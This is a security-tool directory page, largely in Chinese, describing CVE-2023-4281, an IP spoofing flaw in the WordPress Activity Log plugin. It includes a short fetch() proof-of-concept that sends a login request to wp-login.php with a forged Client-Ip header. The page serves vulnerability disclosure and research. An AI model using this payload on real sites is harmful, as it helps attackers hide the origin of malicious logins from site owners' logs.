Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2023-4281 — Repository for CVE-2023-4281 vulnerability. | Kitploit
工具/GitHubGitHub/b0marek/cve-2023-4281
Vulnerability AnalysisIDS/IPS EvasionImpersonation ToolsInformation GatheringWeb Security
GitHubb0marek/cve-2023-4281

CVE-2023-4281

Repository for CVE-2023-4281 vulnerability.

查看仓库
2年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE编号: CVE-2023-4281

漏洞类型: IP地址欺骗

描述: Activity Log 插件从潜在不可信的头部中获取客户端 IP 地址,攻击者可操纵其值。这可能被用于隐藏恶意流量的来源。

复现步骤:

root@kitploit:~
Run the following code in the web browser and note on the backend that the IP address has been faked.

await fetch("/wp-login.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
    "Client-Ip": "8.8.8.8",
  },
  "body": "log=USERNAME&pwd=PASSWORD",
  "method": "POST",
  "mode": "cors",
  "credentials": "include"
});

参考:

  1. https://wpscan.com/vulnerability/f5ea6c8a-6b07-4263-a1be-dd033f078d49
  2. https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-4281
  3. https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/aryo-activity-log/activity-log-287-ip-address-spoofing
下载工具